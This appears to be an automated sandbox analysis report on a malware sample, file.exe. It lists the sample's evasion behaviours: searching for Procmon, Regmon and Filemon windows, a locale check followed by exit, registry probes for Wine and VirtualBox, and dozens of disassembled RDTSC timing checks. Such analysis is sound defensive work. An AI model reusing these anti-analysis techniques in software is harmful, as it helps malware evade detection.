                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37883
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAF0B second address: 12BAF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAF0F second address: 12BAF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAF13 second address: 12BAF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FC400504824h 0x00000010 popad 0x00000011 jmp 00007FC400504826h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA024 second address: 12BA04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC400D80DAEh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC400D80DB5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA1D7 second address: 12BA1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC40050481Ah 0x00000009 jmp 00007FC400504821h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA1F7 second address: 12BA210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA210 second address: 12BA216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA3A4 second address: 12BA3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA3AA second address: 12BA3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007FC400504816h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA3BD second address: 12BA3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA7A9 second address: 12BA7AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA7AF second address: 12BA7F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB6h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FC400D80DC6h 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007FC400D80DB4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2BF second address: 12BC2F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007FC400504824h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FC40050481Ch 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2F5 second address: 12BC2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2F9 second address: 12BC2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2FF second address: 12BC345 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC400D80DACh 0x00000008 jno 00007FC400D80DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 and edx, 6ECD5AAAh 0x00000017 jo 00007FC400D80DAAh 0x0000001d mov dx, 53B7h 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 mov dx, DBB1h 0x00000029 mov dword ptr [ebp+122D2799h], edx 0x0000002f push 00000003h 0x00000031 mov dl, C7h 0x00000033 call 00007FC400D80DA9h 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b jo 00007FC400D80DA6h 0x00000041 pop ebx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC345 second address: 12BC35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400504826h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC35F second address: 12BC363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC363 second address: 12BC3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007FC40050481Fh 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 jmp 00007FC400504820h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 jmp 00007FC40050481Ch 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007FC40050481Ch 0x00000032 jno 00007FC400504816h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC3B7 second address: 12BC3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC619 second address: 12BC62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FC40050481Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBA4A second address: 12DBA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBA50 second address: 12DBA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBD43 second address: 12DBD47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBEFA second address: 12DBF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC400504816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC1AA second address: 12DC1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC1B2 second address: 12DC1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC2F2 second address: 12DC307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC400D80DABh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC307 second address: 12DC30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC30D second address: 12DC311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC63A second address: 12DC63E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC63E second address: 12DC657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC400D80DB3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC7B0 second address: 12DC7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC7B4 second address: 12DC7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC7BD second address: 12DC7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FC400504816h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC8FD second address: 12DC901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC901 second address: 12DC905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC905 second address: 12DC921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC400D80DB0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC921 second address: 12DC93A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007FC400504816h 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DCDB0 second address: 12DCDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC400D80DB1h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1BC5 second address: 12E1BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC40050481Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1BD8 second address: 12E1BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1BDC second address: 12E1BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1BE6 second address: 12E1BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E30FB second address: 12E3101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3101 second address: 12E3106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E434A second address: 12E4366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8036 second address: 12E803A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E803A second address: 12E8042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8042 second address: 12E805F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E81A7 second address: 12E81B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAEB0 second address: 12EAEC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC400D80DACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB16A second address: 12EB175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EBF9D second address: 12EBFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF291 second address: 12EF339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504827h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007FC40050481Bh 0x00000011 pop ecx 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FC400504818h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d call 00007FC400504821h 0x00000032 jmp 00007FC400504823h 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a movzx esi, dx 0x0000003d push 00000000h 0x0000003f jp 00007FC40050481Ch 0x00000045 xchg eax, ebx 0x00000046 jne 00007FC40050482Ch 0x0000004c push eax 0x0000004d push ecx 0x0000004e jng 00007FC40050481Ch 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF00A second address: 12EF02D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FC400D80DCAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC400D80DB2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFDC7 second address: 12EFDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFDCB second address: 12EFDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFDCF second address: 12EFDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F093E second address: 12F0947 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3B3E second address: 12F3B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jl 00007FC40050482Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC40050481Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4B06 second address: 12F4B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4B0A second address: 12F4B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5A2D second address: 12F5A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5A31 second address: 12F5A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FC400504818h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5A43 second address: 12F5A48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6C28 second address: 12F6C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6C2C second address: 12F6C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6C32 second address: 12F6C3C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC40050481Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7B40 second address: 12F7B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FC400D80DAEh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D6F second address: 12F3D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5BD7 second address: 12F5BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4C62 second address: 12F4CE2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ebx, dword ptr [ebp+122D2517h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, 4A0559D5h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FC400504818h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 xor dword ptr [ebp+12483CE6h], edx 0x00000047 jmp 00007FC400504828h 0x0000004c mov eax, dword ptr [ebp+122D0A01h] 0x00000052 mov dword ptr [ebp+122D1C5Dh], edi 0x00000058 push FFFFFFFFh 0x0000005a mov dword ptr [ebp+122D1C1Bh], eax 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA5C second address: 12FAA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D75 second address: 12F3D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5BDB second address: 12F5BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7CE6 second address: 12F7CED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C19 second address: 12F8C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DAFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA67 second address: 12FAA7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC40050481Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D79 second address: 12F3D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA7B second address: 12FAA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB034 second address: 12FB041 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB041 second address: 12FB090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FC400504818h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 add ebx, 151B1DD4h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007FC400504827h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB090 second address: 12FB095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB095 second address: 12FB09B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB245 second address: 12FB249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
